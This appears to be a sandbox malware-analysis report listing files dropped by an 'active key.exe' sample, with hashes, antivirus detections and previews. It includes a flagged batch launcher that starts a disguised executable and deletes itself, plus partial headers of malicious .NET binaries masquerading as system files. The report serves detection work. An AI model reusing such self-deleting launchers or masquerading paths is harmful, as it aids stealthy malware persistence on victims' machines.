                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mteo2glq.45u.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb03hiun.p4n.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpjb4znt.gki.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u543uutv.1tt.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umx0usna.gwn.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqvytuiq.uta.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vgtacgh3.kff.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\po0Y962PsX

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.323856189774724
                                                            Encrypted:false
                                                            SSDEEP:3:sXtWQLmBtW:s91mG
                                                            MD5:E3673C46DD9C643D83C48383663F6392
                                                            SHA1:7B8ED372211C3175824B00B7626C1318B3EFBCD5
                                                            SHA-256:2EE2870ADC981F96889E64375C1593B492AF1D0F743445A8F3485F8BB84C9778
                                                            SHA-512:8816A2D6CD4DF05011E5F4F0161871BDB13FA3E79FFC9B0DBFAE6D8BB6C09612A2E50060EDFF1DB307ABDDB4FEBACA415621344E3845883F40DA29B564BC2C99
                                                            Malicious:false
                                                            Preview:Su1Xhh09CHsx7nCvpxLlXqQ3t

                                                            C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):5.144130830697301
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mV4jEBDWCSBktKcKZG1N+E2J5xAITqt0Gq:hCRLuVFOOr+DEejEBDGKOZG1N723fTqa
                                                            MD5:D6715DEAF8961699F0B7CFBFAC6170AB
                                                            SHA1:04CCBDF2FC2B80D29680221009596DB12DED4B65
                                                            SHA-256:E3D9004E5E8212163E88AD72687EC5C444D6EC27BE086FB0D93B387E126B2315
                                                            SHA-512:ADA5D3B36328A9B5396C11639935D3FB700463D3AE4C75E24709D93DDF392325EA15C132765F92461728C5BD3A1368679DD379086F8B8F0BDA880958E40FA0DC
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\tracing\fontdrvhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\rtOHKAESQQ.bat"

                                                            C:\Users\user\Desktop\DnHERPdP.log

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            • Antivirus: Virustotal, Detection: 29%, Browse
                                                            Joe Sandbox View:
                                                            • Filename: cuAvoExY41.exe, Detection: malicious, Browse
                                                            • Filename: TwfUz3FuO7.exe, Detection: malicious, Browse
                                                            • Filename: 9i0GfIAfU7.exe, Detection: malicious, Browse
                                                            • Filename: i3F8zuP3u9.exe, Detection: malicious, Browse
                                                            • Filename: z3yAH0LL5e.exe, Detection: malicious, Browse
                                                            • Filename: 4ra1Fo2Zql.exe, Detection: malicious, Browse
                                                            • Filename: BUKHuBek8M.exe, Detection: malicious, Browse
                                                            • Filename: ugRGgCJhQl.exe, Detection: malicious, Browse
                                                            • Filename: eCGKhYZtgx.exe, Detection: malicious, Browse
                                                            • Filename: czcgyt.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\UZXJUHSP.log

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            • Antivirus: Virustotal, Detection: 11%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\ZHsakaRB.log

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            • Antivirus: Virustotal, Detection: 28%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\aAtQiRdB.log

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            • Antivirus: Virustotal, Detection: 29%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\hCHhiobl.log

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:modified
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            • Antivirus: Virustotal, Detection: 11%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\mlzPodne.log

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):50176
                                                            Entropy (8bit):5.723168999026349
                                                            Encrypted:false
                                                            SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                            MD5:2E116FC64103D0F0CF47890FD571561E
                                                            SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                            SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                            SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            • Antivirus: Virustotal, Detection: 28%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Windows\System32\33a22f3fbfeb15

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):95
                                                            Entropy (8bit):5.4446571558090415
                                                            Encrypted:false
                                                            SSDEEP:3:hznxa1oMuvcLVnroyay2Rkx9if4gKI30KUQKuWPRq:hznjCrv52Rw847IkKrWPs
                                                            MD5:80AA1C5E06F6555791412CDCDA136E67
                                                            SHA1:428BA9A222B2BB91730BD67D8597369C2088D03D
                                                            SHA-256:ED9395C9B907EAF31AEEFE0E17DCF556077B025FDD0646A1CFA6E49502D0C248
                                                            SHA-512:4E304C8ED779B33955AEC9F73F2DB6EF141C357F734952BE2AA56104433BF88D6AC672AF5BA6754978DFE40325BAE9F1DB0567D02F8E39A9649ADB9C1088FD02
                                                            Malicious:false
                                                            Preview:kmD4fsWBY2CwAoPXZb7iKHzHb9w0Yp8dESNpgWdIWSbTZcnTXHuzyk4cw6cf6gnt4jrrbj1D7yM2qgs8WdcQ4JoeYu3j48M

                                                            C:\Windows\System32\ntoskrnl2.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\active key.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:modified
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%, Browse
                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                            C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%, Browse
                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                            C:\Windows\en-GB\c5cac97cf6c584

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with very long lines (427), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):427
                                                            Entropy (8bit):5.85223997241267
                                                            Encrypted:false
                                                            SSDEEP:12:xJZnTcib2QxHMZTNJoT9wO2MQTNUSMrBblnzjDYrHfLUn:f1cepHM/exwO2RTNTGplnzwUn
                                                            MD5:9BE18CBCA9887C3BCBE08EF459F45817
                                                            SHA1:F8F120DE0268913275562387FB1393E76FD7648D
                                                            SHA-256:C9D5D2A95B695A9E4909FB06ED2BA6B8245BE23B5EE14AD26749ACFE518512B3
                                                            SHA-512:1AB41963EF8A9875ECDD4B16F0B27B260DAD4AFE722BABC1CF2CB88A48A5B99C92AC7CE3A82699063BAAF5DF84F7F63647DE33E7532D6661850E5E32F42DDD91
                                                            Malicious:false
                                                            Preview:qfGIKUwArM0nADYeVxUiieOtrUsxDE7UUMl0deT5b8HbNOImstoe411MRWb0l87mOgTybiA0dZHkWxgdLGEUadacVYiGDdUcBfMr4UKJsxAfuQ0ez7of3nMvG0cC93wAFoj1kzi154lmc4rFiERFzyjXSblE1IJyBAZGq93AZwk8CjSLIXe5mrLQFLiJNe9wvwlcflYjKQqCOkVtIa5eoOLUzJBeauw5xxNP8zqh94vWAICezzAxifIhkRnVj3IZduPbWFuTuXftczTqHgolt8XRoqprMU8FwW2Q3kItErDKAZEu87OCOhpeX7wpaDGZZZ7G6CwgY5gC4MRPm4tOF51PqX36ydTBkovkb8y5LsoTAnkLqhDfU2UdirZiJzr4lebQaqxnGxDXQhODxrQRZyrsURCtiPwVAtsfLTu9tZY

                                                            C:\Windows\tracing\5b884080fd4f94

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):146
                                                            Entropy (8bit):5.682329952951123
                                                            Encrypted:false
                                                            SSDEEP:3:cp9g7XzSkEEGt/0HohX0ym6TRqvlaqyGDN9GSRbPD03whrikxcph:c/0X+kEEn1ymUUla8uSZPD0AViRP
                                                            MD5:2C55C9E7F3147FD32BE49504EEE3537C
                                                            SHA1:A6D78B3D472F9C762FCE8283BAFC348B2C007994
                                                            SHA-256:8A8D15BC6A61DAC73A3C3F6E5A850048F70AA5749FE940D5D1420C9DBB156D80
                                                            SHA-512:6700886543B9D2DF222EFE2A035185F6D0777EB7BA33DA577517F3C4FC82CA2A861DFF1A80C3DB4FE690584A30192540729F635403D9E4A0E2932EA6A64CB21B
                                                            Malicious:false
                                                            Preview:DIRrpFo5C5snYa0TYOnFzTHZ73hYADwWNyDXAVcpLMqZQEoZM2fHS4TuA1uvhP58IWajXdSDv83mmrJ2PHMIipDTfSWJkqH5RsQ3oECtjcVUAqHTr1gZDxadSGEEGJcF08U4bPOKFciGUtTyLD

                                                            C:\Windows\tracing\fontdrvhost.exe

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%, Browse
                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                            \Device\ConDrv

                                                            Download File
                                                            Process:C:\Users\user\Desktop\active key.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):12
                                                            Entropy (8bit):3.418295834054489
                                                            Encrypted:false
                                                            SSDEEP:3:uKwLL:uK+L
                                                            MD5:762D253175E8E29F4492CC1665F0E3DF
                                                            SHA1:E3F69290ED593EC0BBB98D28E837F82A6A74B244
                                                            SHA-256:ECCA0B400F34B416DC75199C6A510CB800098C8BE1564DC2B35E284E5DB8F926
                                                            SHA-512:8756F59D3E0CEB68AF513E28DFE59DD4D4D2B23E03BAB6C6235DC347C3A599CAF0B190E9497EFCBA3A981B101925E347A3B94C5D48121C05F9844FD8EDC40E54
                                                            Malicious:false
                                                            Preview:.. Loading..

                                                            \Device\Null

                                                            Download File
                                                            Process:C:\Windows\System32\PING.EXE
